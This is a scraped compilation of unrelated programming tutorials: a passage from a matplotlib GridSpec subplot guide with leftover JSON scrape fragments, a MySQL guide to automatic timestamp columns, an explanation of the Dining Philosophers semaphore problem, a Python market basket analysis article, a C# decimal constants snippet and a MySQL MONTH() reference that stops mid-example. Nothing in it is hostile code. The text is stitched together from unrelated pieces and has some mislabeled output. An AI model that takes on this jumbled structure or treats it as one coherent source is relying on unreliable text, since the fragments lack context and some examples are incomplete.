the advantages of using gridspec is you can create more subplots in an easier way than that using subplot only. For example, if you want to create more than 10 subplots in a figure, you will define the last coordinates. The subplot only consists of three numbers, e.g., 111, 428, 439, etc. A subplot can not facilitate the fourth. For example, you want to create 18 axes (3 rows and 6 columns) in a figure. If you use subplot only, you need to define 361, 362, 263, ..., 3616. You will face the error when you embed a subplot of 3610. To solve it, you can use gridspec. Figure 8 is presenting the creation of 18 axes using gridspec." 
}, { "code": null, "e": 5891, "s": 5852, "text": "You can create Figure 8 with this code" }, { "code": null, "e": 6169, "s": 5891, "text": "fig = plt.figure(figsize=(22, 8))rows = 3columns = 6grid = plt.GridSpec(rows, columns, wspace = .25, hspace = .25)for i in range(rows*columns): exec (f\"plt.subplot(grid{[i]})\") plt.annotate('subplot 36_grid[' + str(i) + ']', xy = (0.5, 0.5), va = 'center', ha = 'center')" }, { "code": null, "e": 6432, "s": 6169, "text": "To make a more realistic example, I will insert a plot for each axes in Figure 8. So, I need to make 18 different functions for each axes. It is compiled from the function of sin(x^(i/9)), with i is the grid number from 0 to 17. You can see the plot in Figure 9." }, { "code": null, "e": 6483, "s": 6432, "text": "To create Figure 9, you can use the following code" }, { "code": null, "e": 7047, "s": 6483, "text": "fig = plt.figure(figsize=(25, 10))color = ['#00429d', '#2754a6', '#3a67ae', '#487bb7', '#548fc0', '#5ea3c9', '#66b8d3', '#6acedd', '#68e5e9', '#ffe2ca', '#ffc4b4', '#ffa59e', '#f98689', '#ed6976', '#dd4c65', '#ca2f55', '#b11346', '#93003a']rows = 3columns = 6grid = plt.GridSpec(rows, columns, wspace = .25, hspace = .25)for i in range(rows*columns): np.random.seed(100) x = np.linspace(0., 5., 100) y = np.sin(x**(i / 9)) + np.random.random() * i exec (f\"plt.subplot(grid{[i]})\") plt.plot(x, y, color = color[i])" }, { "code": null, "e": 7215, "s": 7047, "text": "To present in different colors, you also need to define 18 different colors. You can generate it using this link. I have explained how to use it in the following link." }, { "code": null, "e": 7238, "s": 7215, "text": "towardsdatascience.com" }, { "code": null, "e": 7393, "s": 7238, "text": "In this section, we will learn about customizing complicated axes using add_subplot and GridSpec. The complicated axes I mentioned are shown in Figure 10." }, { "code": null, "e": 7536, "s": 7393, "text": "We will create 3 axes (2 on the top, 1 on the bottom panel) as shown in Figure 1 using add_subplot syntax. You can use this code to create it." }, { "code": null, "e": 8033, "s": 7536, "text": "If you analyze the code, you will get a similar concept with the subplot syntax concept. There are three coordinates you need to define, e.g., (2, 2, 1) or (2, 2, (3, 4)). The axes sub1 is placed in the first axes (1) on the figure that consists of 2 rows and 2 columns. sub2 has similar schemes with sub1. The important one is sub3, which the combination between axes 3 and 4. So, the coordinate of sub3 is (2, 2, (3, 4)). If you run the code above, you will get a result, as shown in Figure 11." }, { "code": null, "e": 8131, "s": 8033, "text": "If you want to add a plot for each ax, you can add this code after defining sub1, sub2, and sub3." }, { "code": null, "e": 8177, "s": 8131, "text": "sub1.plot(x, y)sub2.plot(x, y)sub3.plot(x, y)" }, { "code": null, "e": 8200, "s": 8177, "text": "The full code is here." }, { "code": null, "e": 8246, "s": 8200, "text": "You will get a result, as shown in Figure 12." }, { "code": null, "e": 8361, "s": 8246, "text": "As an alternative, you can also create Figure 12 using gridspec syntax. Here is the code you can use to create it." }, { "code": null, "e": 8676, "s": 8361, "text": "The code creates 2 rows and 2 columns. sub1 and sub2 are placed on the first row, column 0 and column 1 (remember that gridspec is started from 0 indexes). sub3 is placed on the second row and takes all of the columns, represented by :. 
You will get the same plot, as shown in Figure 12, if you run the code above." }, { "code": null, "e": 8738, "s": 8676, "text": "The second example of complicated axes is shown in Figure 13." }, { "code": null, "e": 8989, "s": 8738, "text": "You will generate four axes in a figure: sub1, sub2, sub3, and sub4, in 2 rows and 4 columns. sub1 takes all the columns in the first row. sub2, sub3, and sub4 are placed on each column in the second row. To generate Figure 12, you can use this code." }, { "code": null, "e": 9048, "s": 8989, "text": "To create Figure 12 using gridspec, you can use this code." }, { "code": null, "e": 9162, "s": 9048, "text": "I think the code above is clear enough to be understood :D. The code will generate a plot, as shown in Figure 14." }, { "code": null, "e": 9203, "s": 9162, "text": "The third example is shown in Figure 15." }, { "code": null, "e": 9247, "s": 9203, "text": "To create Figure 15, you can use this code." }, { "code": null, "e": 9306, "s": 9247, "text": "To create Figure 15 using gridspec, you can use this code." }, { "code": null, "e": 9340, "s": 9306, "text": "The result is shown in Figure 16." }, { "code": null, "e": 9483, "s": 9340, "text": "In the last example, you will be guided to create 6 axes in a figure, with the number of rows is 4 and columns is 2. It is shown in Figure 17." }, { "code": null, "e": 9546, "s": 9483, "text": "To create it with add_subplot, you can use the following code." }, { "code": null, "e": 9604, "s": 9546, "text": "To create Figure 17 with gridspec, you can use this code." }, { "code": null, "e": 9825, "s": 9604, "text": "You need to pay attention to sub4, which is placed in rows 1:3 and column 1. Rows 1:3 means that sub4 will take rows number 1 and 2. Remember, rows 3 is not included. The code will generate a plot, as shown in Figure 17." }, { "code": null, "e": 10102, "s": 9825, "text": "Creating a complex plot to visualize your data is needed while you are working with complex data. I hope this story can help you to visualize your data from a different point of view. If you need to create scientific publication plots with Matplotlib, you can visit this link." }, { "code": null, "e": 10125, "s": 10102, "text": "towardsdatascience.com" }, { "code": null, "e": 10148, "s": 10125, "text": "towardsdatascience.com" }, { "code": null, "e": 10171, "s": 10148, "text": "towardsdatascience.com" }, { "code": null, "e": 10194, "s": 10171, "text": "towardsdatascience.com" }, { "code": null, "e": 10217, "s": 10194, "text": "towardsdatascience.com" } ]
Can MySQL automatically store timestamp in a row?
Yes, you can achieve this in the following two ways.

First approach: at the time of creating the table.
Second approach: using an ALTER query on an existing table.

The syntax for the first approach is as follows.

CREATE TABLE yourTableName
(
   yourDateTimeColumnName datetime default current_timestamp
);

For the second approach, you can use the ALTER command. The syntax is as follows.

ALTER TABLE yourTableName ADD yourColumnName datetime DEFAULT CURRENT_TIMESTAMP;

Let us now implement both approaches. The first approach is as follows.

mysql> create table CurrentTimeStampDemo
    -> (
    -> CreationDate datetime default current_timestamp
    -> );
Query OK, 0 rows affected (0.61 sec)

If you do not pass any value for the column 'CreationDate', MySQL by default stores the current timestamp.

Insert a record into the table using the insert command. The query is as follows.

mysql> insert into CurrentTimeStampDemo values();
Query OK, 1 row affected (0.12 sec)

Let us now display all records from the table using the select command. The query is as follows.

mysql> select * from CurrentTimeStampDemo;

The following is the output.

+---------------------+
| CreationDate        |
+---------------------+
| 2019-01-02 15:53:03 |
+---------------------+
1 row in set (0.00 sec)

The second approach uses the ALTER command. The query to create a table is as follows.

mysql> create table Current_TimestampDemo
    -> (
    -> Id int
    -> );
Query OK, 0 rows affected (0.43 sec)

Here is the query to automatically store the creation time. The query is as follows.

mysql> ALTER TABLE Current_TimestampDemo
    -> ADD CreationDate datetime DEFAULT CURRENT_TIMESTAMP;
Query OK, 0 rows affected (0.53 sec)
Records: 0  Duplicates: 0  Warnings: 0

If you do not pass a value for the column 'CreationDate', MySQL stores the current datetime value for this column. The query is as follows.

mysql> insert into Current_TimestampDemo(Id) values(1);
Query OK, 1 row affected (0.19 sec)

Display records of the table using a select statement. The query is as follows.

mysql> select CreationDate from Current_TimestampDemo;

The following is the output.

+---------------------+
| CreationDate        |
+---------------------+
| 2019-01-02 16:25:12 |
+---------------------+
1 row in set (0.00 sec)
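If you want to confirm this behavior from application code, here is a small sketch in Python; the mysql-connector-python package, the connection credentials, and the inserted Id value are illustrative assumptions, not part of the original example.

# verify the default-timestamp behavior from Python
# assumes: pip install mysql-connector-python, and placeholder credentials
import mysql.connector

conn = mysql.connector.connect(host="localhost", user="root",
                               password="secret", database="test")
cur = conn.cursor()

# omit CreationDate so MySQL fills in the current timestamp itself
cur.execute("INSERT INTO Current_TimestampDemo (Id) VALUES (2)")
conn.commit()

cur.execute("SELECT Id, CreationDate FROM Current_TimestampDemo")
for row in cur.fetchall():
    print(row)   # CreationDate was stored automatically

conn.close()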
[ { "code": null, "e": 1115, "s": 1062, "text": "Yes, you can achieve this in the following two ways." }, { "code": null, "e": 1166, "s": 1115, "text": "First Approach At the time of creation of a table." }, { "code": null, "e": 1217, "s": 1166, "text": "First Approach At the time of creation of a table." }, { "code": null, "e": 1263, "s": 1217, "text": "Second Approach At the time of writing query." }, { "code": null, "e": 1309, "s": 1263, "text": "Second Approach At the time of writing query." }, { "code": null, "e": 1335, "s": 1309, "text": "The syntax is as follows." }, { "code": null, "e": 1425, "s": 1335, "text": "CREATE TABLE yourTableName\n(\nyourDateTimeColumnName datetime default current_timestamp\n);" }, { "code": null, "e": 1452, "s": 1425, "text": "You can use alter command." }, { "code": null, "e": 1478, "s": 1452, "text": "The syntax is as follows." }, { "code": null, "e": 1559, "s": 1478, "text": "ALTER TABLE yourTableName ADD yourColumnName datetime DEFAULT CURRENT_TIMESTAMP;" }, { "code": null, "e": 1592, "s": 1559, "text": "Implement both the syntaxes now." }, { "code": null, "e": 1626, "s": 1592, "text": "The first approach is as follows." }, { "code": null, "e": 1766, "s": 1626, "text": "mysql> create table CurrentTimeStampDemo\n-> (\n-> CreationDate datetime default current_timestamp\n-> );\nQuery OK, 0 rows affected (0.61 sec)" }, { "code": null, "e": 1877, "s": 1766, "text": "If you do not pass any parameter for the column ‘CreationDate’, MySQL by default stores the current timestamp." }, { "code": null, "e": 1951, "s": 1877, "text": "Insert record in the table using insert command. The query is as follows." }, { "code": null, "e": 2083, "s": 1951, "text": "mysql> insert into CurrentTimeStampDemo values();\nQuery OK, 1 row affected (0.12 sec)\nLet us now display all records from the table" }, { "code": null, "e": 2130, "s": 2083, "text": "using select command. The query is as follows." }, { "code": null, "e": 2172, "s": 2130, "text": "mysql> select *from CurrentTimeStampDemo;" }, { "code": null, "e": 2201, "s": 2172, "text": "The following is the output." }, { "code": null, "e": 2345, "s": 2201, "text": "+---------------------+\n| CreationDate |\n+---------------------+\n| 2019-01-02 15:53:03 |\n+---------------------+\n1 row in set (0.00 sec)" }, { "code": null, "e": 2417, "s": 2345, "text": "This is using ALTER command. The query to create a table is as follows." }, { "code": null, "e": 2517, "s": 2417, "text": "mysql> create table Current_TimestampDemo\n-> (\n-> Id int\n-> );\nQuery OK, 0 rows affected (0.43 sec)" }, { "code": null, "e": 2598, "s": 2517, "text": "Here is the query to automatically store creation time. The query is as follows." }, { "code": null, "e": 2769, "s": 2598, "text": "mysql> ALTER TABLE Current_TimestampDemo\n-> ADD CreationDate datetime DEFAULT CURRENT_TIMESTAMP;\nQuery OK, 0 rows affected (0.53 sec)\nRecords: 0 Duplicates: 0 Warnings: 0" }, { "code": null, "e": 2907, "s": 2769, "text": "If you do not pass the value for column ‘CreationDate’. MySQL stores the current datetime value for this column. The query is as follows." }, { "code": null, "e": 2999, "s": 2907, "text": "mysql> insert into Current_TimestampDemo(Id) values(1);\nQuery OK, 1 row affected (0.19 sec)" }, { "code": null, "e": 3077, "s": 2999, "text": "Display records of the table using select statement. The query is as follows." 
}, { "code": null, "e": 3132, "s": 3077, "text": "mysql> select CreationDate from Current_TimestampDemo;" }, { "code": null, "e": 3161, "s": 3132, "text": "The following is the output." }, { "code": null, "e": 3305, "s": 3161, "text": "+---------------------+\n| CreationDate |\n+---------------------+\n| 2019-01-02 16:25:12 |\n+---------------------+\n1 row in set (0.00 sec)" } ]
Dining Philosophers Problem (DPP)
The dining philosophers problem states that there are 5 philosophers sharing a circular table, and they eat and think alternately. There is a bowl of rice for each of the philosophers and 5 chopsticks. A philosopher needs both their right and left chopstick to eat. A hungry philosopher may only eat if both chopsticks are available. Otherwise, a philosopher puts down their chopstick and begins thinking again. The dining philosophers problem is a classic synchronization problem, as it demonstrates a large class of concurrency control problems. A solution of the Dining Philosophers Problem is to use a semaphore to represent a chopstick. A chopstick can be picked up by executing a wait operation on the semaphore and released by executing a signal operation. The structure of the chopstick is shown below −

semaphore chopstick [5];

Initially, the elements of chopstick are initialized to 1, as the chopsticks are on the table and not picked up by any philosopher. The structure of a random philosopher i is given as follows −

do {
   wait( chopstick[i] );
   wait( chopstick[ (i+1) % 5] );
   . .
   . EATING THE RICE
   .
   signal( chopstick[i] );
   signal( chopstick[ (i+1) % 5] );
   .
   . THINKING
   .
} while(1);

In the above structure, the first wait operations are performed on chopstick[i] and chopstick[ (i+1) % 5]. This means that philosopher i has picked up the chopsticks on both sides. Then the eating function is performed. After that, signal operations are performed on chopstick[i] and chopstick[ (i+1) % 5]. This means that philosopher i has finished eating and put down the chopsticks on both sides. Then the philosopher goes back to thinking. The above solution makes sure that no two neighboring philosophers can eat at the same time. But this solution can lead to a deadlock. This may happen if all the philosophers pick up their left chopstick simultaneously. Then none of them can eat and a deadlock occurs. Some of the ways to avoid deadlock are as follows − There should be at most four philosophers at the table. An even philosopher should pick up the right chopstick first and then the left chopstick, while an odd philosopher should pick up the left chopstick first and then the right chopstick (a sketch of this strategy is shown below). A philosopher should only be allowed to pick up their chopsticks if both are available at the same time.
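Here is a minimal sketch of the even/odd pickup strategy in Python; the use of threading.Semaphore for the chopsticks and the fixed number of meals are illustrative assumptions, not part of the original pseudocode.

import threading

N = 5
# one semaphore per chopstick, all initially available
chopstick = [threading.Semaphore(1) for _ in range(N)]

def philosopher(i, meals = 3):
    left, right = i, (i + 1) % N
    # even philosophers pick up the right chopstick first, odd ones the left;
    # this asymmetry breaks the circular wait, so no deadlock can form
    first, second = (right, left) if i % 2 == 0 else (left, right)
    for _ in range(meals):
        chopstick[first].acquire()    # wait()
        chopstick[second].acquire()   # wait()
        print(f"philosopher {i} is eating")
        chopstick[second].release()   # signal()
        chopstick[first].release()    # signal()
        # back to thinking

threads = [threading.Thread(target = philosopher, args = (i,)) for i in range(N)]
for t in threads:
    t.start()
for t in threads:
    t.join()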
[ { "code": null, "e": 1478, "s": 1062, "text": "The dining philosophers problem states that there are 5 philosophers sharing a circular table and they eat and think alternatively. There is a bowl of rice for each of the philosophers and 5 chopsticks. A philosopher needs both their right and left chopstick to eat. A hungry philosopher may only eat if there are both chopsticks available.Otherwise a philosopher puts down their chopstick and begin thinking again." }, { "code": null, "e": 1604, "s": 1478, "text": "The dining philosopher is a classic synchronization problem as it demonstrates a large class of concurrency control problems." }, { "code": null, "e": 1820, "s": 1604, "text": "A solution of the Dining Philosophers Problem is to use a semaphore to represent a chopstick. A chopstick can be picked up by executing a wait operation on the semaphore and released by executing a signal semaphore." }, { "code": null, "e": 1868, "s": 1820, "text": "The structure of the chopstick is shown below −" }, { "code": null, "e": 1893, "s": 1868, "text": "semaphore chopstick [5];" }, { "code": null, "e": 2025, "s": 1893, "text": "Initially the elements of the chopstick are initialized to 1 as the chopsticks are on the table and not picked up by a philosopher." }, { "code": null, "e": 2087, "s": 2025, "text": "The structure of a random philosopher i is given as follows −" }, { "code": null, "e": 2283, "s": 2087, "text": "do {\n wait( chopstick[i] );\n wait( chopstick[ (i+1) % 5] );\n . .\n . EATING THE RICE\n .\n signal( chopstick[i] );\n signal( chopstick[ (i+1) % 5] );\n .\n . THINKING\n .\n} while(1);" }, { "code": null, "e": 2500, "s": 2283, "text": "In the above structure, first wait operation is performed on chopstick[i] and chopstick[ (i+1) % 5]. This means that the philosopher i has picked up the chopsticks on his sides. Then the eating function is performed." }, { "code": null, "e": 2715, "s": 2500, "text": "After that, signal operation is performed on chopstick[i] and chopstick[ (i+1) % 5]. This means that the philosopher i has eaten and put down the chopsticks on his sides. Then the philosopher goes back to thinking." }, { "code": null, "e": 2979, "s": 2715, "text": "The above solution makes sure that no two neighboring philosophers can eat at the same time. But this solution can lead to a deadlock. This may happen if all the philosophers pick their left chopstick simultaneously. Then none of them can eat and deadlock occurs." }, { "code": null, "e": 3031, "s": 2979, "text": "Some of the ways to avoid deadlock are as follows −" }, { "code": null, "e": 3087, "s": 3031, "text": "There should be at most four philosophers on the table." }, { "code": null, "e": 3253, "s": 3087, "text": "An even philosopher should pick the right chopstick and then the left chopstick while an odd philosopher should pick the left chopstick and then the right chopstick." }, { "code": null, "e": 3354, "s": 3253, "text": "A philosopher should only be allowed to pick their chopstick if both are available at the same time." } ]
MBA For Breakfast — A Simple Guide to Market Basket Analysis | by George Wong | Towards Data Science
So recently, I was fortunate enough to work on a project that involves doing market basket analysis, but obviously I wouldn't be able to discuss my work at Kaodim on Medium. So instead, I looked for suitable datasets on Kaggle.com, managed to find one here, AND applied whatever I know to make it happen! Also, shout-out to Susan Li for her wonderful work on MBA, which can be found here!

So what is a Market Basket Analysis? According to the book Database Marketing:

Market basket analysis scrutinizes the products customers tend to buy together, and uses the information to decide which products should be cross-sold or promoted together. The term arises from the shopping carts supermarket shoppers fill up during a shopping trip.

On a side note, Market Basket is also a chain of 79 supermarkets in New Hampshire, Massachusetts, and Maine in the United States, with headquarters in Tewksbury, Massachusetts (Wikipedia).

Normally, MBA is done on transaction data from the point-of-sale system at the customer level. We can use MBA to extract interesting associations between products from the data. Hence its output consists of a series of product association rules: for example, if customers buy product A, they also tend to buy product B. We will follow the three most popular criteria for evaluating the quality or the strength of an association rule (we will get back to this later).

Getting the right packages (Python):

import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from mlxtend.frequent_patterns import apriori
from mlxtend.frequent_patterns import association_rules
import mlxtend as ml

bread = pd.read_csv(r"D:\Downloads\BreadBasket_DMS.csv")
bread.head(8)

"Data set containing 15'010 observations and more than 6.000 transactions from a bakery." More information on the variables can be found in Kaggle.

What are the "hot" items at BreadBasket?

sns.countplot(x = 'Item', data = bread, order = bread['Item'].value_counts().iloc[:10].index)
plt.xticks(rotation=90)

It seems like coffee is the hottest item in the dataset; I guess everybody wants a cup of hot coffee in the morning.

Time to get right into the MBA itself! Kudos to Chris Moffitt for the awesome guide and tutorial on MBA using Python.

We will be using the MLxtend library's Apriori algorithm to extract frequent item sets for further analysis. The apriori function expects data in a one-hot encoded pandas DataFrame. Thus your dataframe should look like this:

First, we'll group the bread dataframe accordingly and display the count of items; then we need to consolidate the items into 1 transaction per row, with each product one-hot encoded, which results in the table above!

df = bread.groupby(['Transaction','Item']).size().reset_index(name='count')
basket = (df.groupby(['Transaction', 'Item'])['count']
          .sum().unstack().reset_index().fillna(0)
          .set_index('Transaction'))

# The encoding function
def encode_units(x):
    if x <= 0:
        return 0
    if x >= 1:
        return 1

basket_sets = basket.applymap(encode_units)

After that, we will generate frequent item sets with a minimum support of at least 1%, as this is a more favourable support level that could show us more results.

frequent_itemsets = apriori(basket_sets, min_support=0.01, use_colnames=True)
rules = association_rules(frequent_itemsets, metric="lift")
rules.sort_values('confidence', ascending = False, inplace = True)
rules.head(10)

Remember I told y'all that we'll get back to the three most popular criteria for evaluating the quality or the strength of an association rule? There are support, confidence and lift:

1. Support is the percentage of transactions containing a particular combination of items relative to the total number of transactions in the database. The support for the combination A and B would be

P(AB), or P(A) for an individual item A.

2. Confidence measures how much the consequent (item) is dependent on the antecedent (item). In other words, confidence is the conditional probability of the consequent given the antecedent,

P(B|A), where P(B|A) = P(AB)/P(A).

3. Lift (also called improvement or impact) is a measure to overcome the problems with support and confidence. Lift is said to measure the difference, expressed as a ratio, between the confidence of a rule and the expected confidence. Consider an association rule "if A then B." The lift for the rule is defined as

P(B|A)/P(B) or P(AB)/[P(A)P(B)].

As shown in the formula, lift is symmetric in that the lift for "if A then B" is the same as the lift for "if B then A." Each criterion has its advantages and disadvantages, but in general we would like association rules that have high confidence, high support, and high lift.

As a summary,

Confidence = P(B|A)
Support = P(AB)
Lift = P(B|A)/P(B)

From the output, the lift of the association rule "if Toast then Coffee" is 1.48 and the confidence is 70%. This means that consumers who purchase Toast are 1.48 times more likely to also purchase Coffee than randomly chosen customers. Larger lift means more interesting rules. Association rules with high support are potentially interesting rules. Similarly, rules with high confidence would be interesting rules as well.
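As a quick numeric check of the three formulas, here is a tiny sketch; the transaction counts are made up to roughly reproduce the Toast and Coffee numbers above, not the actual BreadBasket counts.

# made-up counts, chosen only to illustrate the formulas
n_transactions = 1000   # total transactions
n_toast = 30            # transactions containing Toast (antecedent)
n_coffee = 478          # transactions containing Coffee (consequent)
n_both = 21             # transactions containing both

support = n_both / n_transactions                  # P(AB)          = 0.021
confidence = n_both / n_toast                      # P(B|A)         = 0.70
lift = confidence / (n_coffee / n_transactions)    # P(B|A) / P(B)  ~ 1.46

print(support, confidence, lift)

# the same thresholds can then be applied to the mlxtend output, e.g.:
# rules[(rules['support'] >= 0.01) & (rules['confidence'] >= 0.5) & (rules['lift'] > 1)]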
Reference:

Kaggle dataset: https://www.kaggle.com/xvivancos/transactions-from-a-bakery
Susan Li's Market Basket Analysis: https://towardsdatascience.com/a-gentle-introduction-on-market-basket-analysis-association-rules-fa4b986a40ce
Database Marketing book: https://www.springer.com/gp/book/9780387725789
Apriori algorithm: http://rasbt.github.io/mlxtend/user_guide/frequent_patterns/apriori/
Market Basket Analysis using Python by Chris Moffitt: http://pbpython.com/market-basket-analysis.html
Kaodim.com: https://www.kaodim.com/

Source code in Jupyter Notebook here!
[ { "code": null, "e": 576, "s": 172, "text": "So recently, I was fortunate enough to work on a project that involves doing market basket analysis but obviously I wouldn’t be able to discuss my work at Kaodim on Medium. So instead, I try to look for suitable datasets on Kaggle.com. Which I managed to find one here AND applied whatever that I know to make it happen! Also Shout-out to Susan Li for her wonderful work on MBA, which can be found here!" }, { "code": null, "e": 655, "s": 576, "text": "So what is a Market Basket Analysis? According to the book Database Marketing:" }, { "code": null, "e": 921, "s": 655, "text": "Market basket analysis scrutinizes the products customers tend to buy together, and uses the information to decide which products should be cross-sold or promoted together. The term arises from the shopping carts supermarket shoppers fill up during a shopping trip." }, { "code": null, "e": 1110, "s": 921, "text": "On a side note, Market Basket is also a chain of 79 supermarkets in New Hampshire, Massachusetts, and Maine in the United States, with headquarters in Tewksbury, Massachusetts (Wikipedia)." }, { "code": null, "e": 1566, "s": 1110, "text": "Normally MBA is done on transaction data from the point of sales system on a customer level. We can use MBA to extract interesting association between products from the data. Hence its output consists of a series of product association rules: for example, if customers buy product A they also tend to buy product B. We will follow the three most popular criteria evaluating the quality or the strength of an association rule (will get back to this later)." }, { "code": null, "e": 1603, "s": 1566, "text": "Getting the right packages (Python):" }, { "code": null, "e": 1814, "s": 1603, "text": "import pandas as pdimport numpy as np import seaborn as snsimport matplotlib.pyplot as pltfrom mlxtend.frequent_patterns import apriorifrom mlxtend.frequent_patterns import association_rulesimport mlxtend as ml" }, { "code": null, "e": 1884, "s": 1814, "text": "bread = pd.read_csv(r\"D:\\Downloads\\BreadBasket_DMS.csv\")bread.head(8)" }, { "code": null, "e": 2032, "s": 1884, "text": "“Data set containing 15'010 observations and more than 6.000 transactions from a bakery.” More information on the variables can be found in Kaggle." }, { "code": null, "e": 2073, "s": 2032, "text": "What are the “hot” items at BreadBasket?" }, { "code": null, "e": 2190, "s": 2073, "text": "sns.countplot(x = 'Item', data = bread, order = bread['Item'].value_counts().iloc[:10].index)plt.xticks(rotation=90)" }, { "code": null, "e": 2316, "s": 2190, "text": "It seems like coffee are the hottest item in the dataset, I guess everybody wants a cup of hot coffee in the morning perhaps." }, { "code": null, "e": 2433, "s": 2316, "text": "Time to get right into the MBA itself! Kudos to Chris Moffitt on the awesome guide and tutorial of MBA using python." }, { "code": null, "e": 2657, "s": 2433, "text": "We will be using MLxtend library’s Apriori Algorithm for extracting frequent item sets for further analysis. The apriorifunction expects data in a one-hot encoded pandas DataFrame. Thus your dataframe should look like this:" }, { "code": null, "e": 2876, "s": 2657, "text": "First, We’ll group the bread dataframe accordingly and display the count of items then we need to consolidate the items into 1 transaction per row with each product 1 hot encoded. Which would result in the table above!" 
}, { "code": null, "e": 3237, "s": 2876, "text": "df = bread.groupby(['Transaction','Item']).size().reset_index(name='count')basket = (df.groupby(['Transaction', 'Item'])['count'] .sum().unstack().reset_index().fillna(0) .set_index('Transaction'))#The encoding functiondef encode_units(x): if x <= 0: return 0 if x >= 1: return 1basket_sets = basket.applymap(encode_units)" }, { "code": null, "e": 3396, "s": 3237, "text": "After that, we will generate frequent item sets with a minimum support of at least 1% as this a more favourable support level that could show us more results." }, { "code": null, "e": 3613, "s": 3396, "text": "frequent_itemsets = apriori(basket_sets, min_support=0.01, use_colnames=True)rules = association_rules(frequent_itemsets, metric=\"lift\")rules.sort_values('confidence', ascending = False, inplace = True)rules.head(10)" }, { "code": null, "e": 3995, "s": 3613, "text": "Remember I told y’all that we’ll get back to the three most popular criteria evaluating the quality or the strength of an association rule. There are support, confidence and lift: 1. Support is the percentage of transactions containing a particular combination of items relative to the total number of transactions in the database. The support for the combination A and B would be," }, { "code": null, "e": 4026, "s": 3995, "text": "P(AB) or P(A) for Individual A" }, { "code": null, "e": 4216, "s": 4026, "text": "2. Confidence measures how much the consequent (item) is dependent on theantecedent (item). In other words, confidence is the conditional probability of the consequent given the antecedent," }, { "code": null, "e": 4223, "s": 4216, "text": "P(B|A)" }, { "code": null, "e": 4249, "s": 4223, "text": "where P(B|A) = P(AB)/P(A)" }, { "code": null, "e": 4562, "s": 4249, "text": "3. Lift (also called improvement or impact) is a measure to overcome theproblems with support and confidence. Lift is said to measure the difference — measured in ratio — between the confidence of a rule and the expected confidence. Consider an association rule “if A then B.” The lift for the rule is defined as" }, { "code": null, "e": 4595, "s": 4562, "text": "P(B|A)/P(B) or P(AB)/[P(A)P(B)]." }, { "code": null, "e": 4873, "s": 4595, "text": "As shown in the formula, lift is symmetric in that the lift for “if A then B” is the same as the lift for “if B then A.”4. Each criterion has its advantages and disadvantages but in general we would like association rules that have high confidence, high support, and high lift." }, { "code": null, "e": 4887, "s": 4873, "text": "As a summary," }, { "code": null, "e": 4907, "s": 4887, "text": "Confidence = P(B|A)" }, { "code": null, "e": 4923, "s": 4907, "text": "Support = P(AB)" }, { "code": null, "e": 4942, "s": 4923, "text": "Lift = P(B|A)/P(B)" }, { "code": null, "e": 5363, "s": 4942, "text": "From the output, the lift of an association rule “if Toast then Coffee” is 1.48 because the confidence is 70%. This means that consumers who purchase Toast are 1.48 times more likely to purchase Coffee than randomly chosen customers. Larger lift means more interesting rules. Association rules with high support are potentially interesting rules. Similarly, rules with high confidence would be interesting rules as well." 
}, { "code": null, "e": 5374, "s": 5363, "text": "Reference:" }, { "code": null, "e": 5450, "s": 5374, "text": "Kaggle Dataset: https://www.kaggle.com/xvivancos/transactions-from-a-bakery" }, { "code": null, "e": 5595, "s": 5450, "text": "Susan Li’s Market Basket Analysis: https://towardsdatascience.com/a-gentle-introduction-on-market-basket-analysis-association-rules-fa4b986a40ce" }, { "code": null, "e": 5667, "s": 5595, "text": "Database Marketing book: https://www.springer.com/gp/book/9780387725789" }, { "code": null, "e": 5755, "s": 5667, "text": "Apriori Algorithm: http://rasbt.github.io/mlxtend/user_guide/frequent_patterns/apriori/" }, { "code": null, "e": 5857, "s": 5755, "text": "Market Basket Analysis using Python by Chris Moffitt: http://pbpython.com/market-basket-analysis.html" }, { "code": null, "e": 5893, "s": 5857, "text": "Kaodim.com: https://www.kaodim.com/" } ]
Decimal constants in C#
Decimal type has constants to get the minimum and maximum values.

Set a decimal value −

decimal d = 5.8M;

To get the minimum and maximum values of the decimal type, use the following properties −

decimal.MaxValue
decimal.MinValue

Here is the complete code −

using System;
using System.Linq;
class Demo {
   static void Main() {
      decimal d = 5.8M;
      Console.WriteLine(d);
      Console.WriteLine("Maximum Value: " + decimal.MaxValue);
      Console.WriteLine("Minimum Value: " + decimal.MinValue);
   }
}

5.8
Maximum Value: 79228162514264337593543950335
Minimum Value: -79228162514264337593543950335
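As an aside (not part of the original C# example), other languages expose similar limit constants for their numeric types. A minimal Python sketch using the standard sys module:

import sys

# float limits, analogous in spirit to decimal.MaxValue / decimal.MinValue
print(sys.float_info.max)   # largest finite float
print(sys.float_info.min)   # smallest positive normalized float (not the most negative value)
print(-sys.float_info.max)  # the most negative finite float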
[ { "code": null, "e": 1128, "s": 1062, "text": "Decimal type has constants to get the minimum and maximum values." }, { "code": null, "e": 1150, "s": 1128, "text": "Set a decimal value −" }, { "code": null, "e": 1168, "s": 1150, "text": "decimal d = 5.8M;" }, { "code": null, "e": 1258, "s": 1168, "text": "To get the minimum and maximum values of the decimal type, use the following properties −" }, { "code": null, "e": 1292, "s": 1258, "text": "decimal.MaxValue\ndecimal.MinValue" }, { "code": null, "e": 1320, "s": 1292, "text": "Here is the complete code −" }, { "code": null, "e": 1331, "s": 1320, "text": " Live Demo" }, { "code": null, "e": 1582, "s": 1331, "text": "using System;\nusing System.Linq;\nclass Demo {\n static void Main() {\n decimal d = 5.8M;\n Console.WriteLine(d);\n Console.WriteLine(\"Maximum Value: \"+decimal.MaxValue);\n Console.WriteLine(\"Maximum Value: \"+decimal.MinValue);\n }\n}" }, { "code": null, "e": 1677, "s": 1582, "text": "5.8\nMaximum Value: 79228162514264337593543950335\nMaximum Value: -79228162514264337593543950335" } ]
MySQL - MONTH() Function
The DATE, DATETIME and TIMESTAMP datatypes in MySQL are used to store date, date-and-time, and timestamp values respectively, where a timestamp is a numerical value representing the number of seconds from '1970-01-01 00:00:01' UTC (the epoch) to the specified time. MySQL provides a set of functions to manipulate these values.

The MySQL MONTH() function is used to retrieve and return the month of the given date or date-time expression. This function returns a numerical value ranging from 1 to 12, representing the month (January to December).

Following is the syntax of the above function −

MONTH(date);

Where date is the date value from which you need to retrieve the month.

Following example demonstrates the usage of the MONTH() function −

mysql> SELECT MONTH('2019-05-25');
+---------------------+
| MONTH('2019-05-25') |
+---------------------+
|                   5 |
+---------------------+
1 row in set (0.18 sec)

Following is another example of this function −

mysql> SELECT MONTH('2008-09-17');
+---------------------+
| MONTH('2008-09-17') |
+---------------------+
|                   9 |
+---------------------+
1 row in set (0.00 sec)

If the month value in the given date is 0, this function returns 0 −

mysql> SELECT MONTH('2017-00-00');
+---------------------+
| MONTH('2017-00-00') |
